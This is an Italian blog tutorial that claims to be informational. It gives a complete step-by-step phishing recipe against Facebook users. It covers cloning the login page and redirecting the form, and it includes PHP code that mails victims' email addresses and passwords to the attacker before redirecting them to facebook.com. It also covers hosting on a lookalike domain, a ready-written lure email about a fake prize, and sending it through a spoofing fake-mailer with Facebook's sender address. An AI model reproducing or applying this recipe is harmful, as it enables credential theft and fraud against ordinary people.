Truffare con il Fake Login
Vi è mai capitato di ricevere email strane e/o sospette di ebay, paypal o altri servizi importanti di e-commerce e pagamenti online ?
Guardate questa email:
Sembra autentica, vero ?
E’ chiaro che è una truffa!
Anche perchè io non sono neanche registrato ad ebay!
Una tecnica diffusissima a cui dovete stare molto attenti è questa:
Si inviano delle fake email ( Che hanno come mittente l’email vera, autentica e ufficiale del servizio per cui ci si vuole spacciare ),
queste fake mail contengono uno ”scusante” che ti fanno raggiungere un’indirizzo web dove è riprodotto il sito(Ad esempio Ebay)
esattamente cosi’ com’è e dove c’è un form per loggarsi e l’utente che ci casca inserire i veri username e password, che in realtà vengono
inviati ai truffatori:)
Come fanno i truffatori”?
Per un giorno diventiamo truffatori 🙂
Queste informazioni sono solo per farvi capire e quindi per puro scopo informativo 🙂
Tutto ciò che ci serve è :
– Uno spazio web disponibile
– Un qualsiasi editor html( Meglio se Golive o Dreamweaver)
– Un sito o un programma contenente un servizio di fake mailer.
(Nel nostro caso useremo il mio:
https://www.matteoiammarrone.com/public/modules.php?name=fakemail
)
Fase 1 – Scegliamo un servizio famoso ”Vittima”.
Nel nostro caso scegliamo il famosissimo social network: Facebook
Adesso lo scopo dovrà essere quello di creare una pagina web identica alla pagina web di login di facebook 🙂
Per me che possiedo Adobe Golive è molto semplice, perchè in Adobe Golive è presente una funzione che mi consente di ”Scaricare i siti”,
in questo modo: File -> Server -> Download Page, dopodichè inserisco l’indirizzo: http://www.facebook .com e clicco su ”Download”.
Adesso modifichiamo l’act del form login di facebook sostituendo nel codice della pagina che abbiamo scaricato:
sostituendo
<form method=”post” action=”http://login.facebook.com/login.php?attempt=0″ name=”menubar_login” id=”menubar_login”>
con
<form method=”post” action=”index.php” name=”menubar_login” id=”menubar_login”>
Ora sviluppiamoci un codice php che ci invii tramite email il contenuto del campo username e password.
Nel caso di facebook, questo codice può andar bene:
<?php
if (isset($_POST[’pass’])){
$username=$_POST[’email’];
$password=$_POST[’pass’];
$mail = ”miaemail@sadsa.it”; //INSERITE QUI LA VOSTRA EMAIL”
mail($mail, ”Nuova vittima!”, ”EmailVittima: $username PAssword Vittima: $pass”);
echo ”<meta http-equiv=’refresh’ content=’0, url=http://www.facebook.com’/>”;
}
?>
Inserite il codice sovrastante in un punto qualsiasi della pagina che avete scaricato e risalvate la pagina con estensione php.
Adesso passiamo alla fase 2.
Fase 2 – Connettiamoci via ftp ad un nostro spazio web ( IL massimo sarebbe se è uno spazio web che ha un nome simile a facebook, ad esempio facebook.altervista.org, oppure facebook.net..ecc), una volta connessi all’ftp pubblichiamo il sito ”clone” di facebook.
Nel nostro caso lo spazio web sarà: www.matteoiammarrone.com/fbtruffa
Fase 3 – Costruiamo l’email.
Nel nostro caso dobbiamo prendere come modello le vere email inviate dal vero facebook.
Siamo fortunati, visto che le email di facebook sono semplici testi e sostanzialmente non usano html, loghi o simboli particolari.
La nostra email avrà questo ”testo piatto”:
Sei uno dei 100.000 utenti selezionati in tutta facebook per tentare di vincere il premio: Utente dell'anno!
Per confermare la tua identità effettua il login a facebook dal link sottostante:
https://www.matteoiammarrone.com/fbtruffa
Grazie,
il team di facebook.
------------
Vuoi specificare quali e-mail ricevere da Facebook? Accedi a: http://www.facebook.com/editaccount.php?notifications&md=ZXZlbnRfdXBkYXRlO2Zyb209MTU3MDk4MDU1Njt0bz0xNjAyMjc5OTk2">http://www.facebook.com/editaccount.php?notifications&md=ZXZlbnRfdXBkYXRlO2Zyb209MTU3MDk4MDU1Njt0bz0xNjAyMjc5OTk2
Adesso inviamo il messaggio sovrastante usando questo fake email:
https://www.matteoiammarrone.com/public/modules.php?name=fakemail
Come email vittima inserita l'email di una persona di cui sapete della sua presenza su facebook, come email mittente inserite: noreply@facebookmail.com
:):)
Dopodichè inviate l'email e il giochino e' fatto!
:)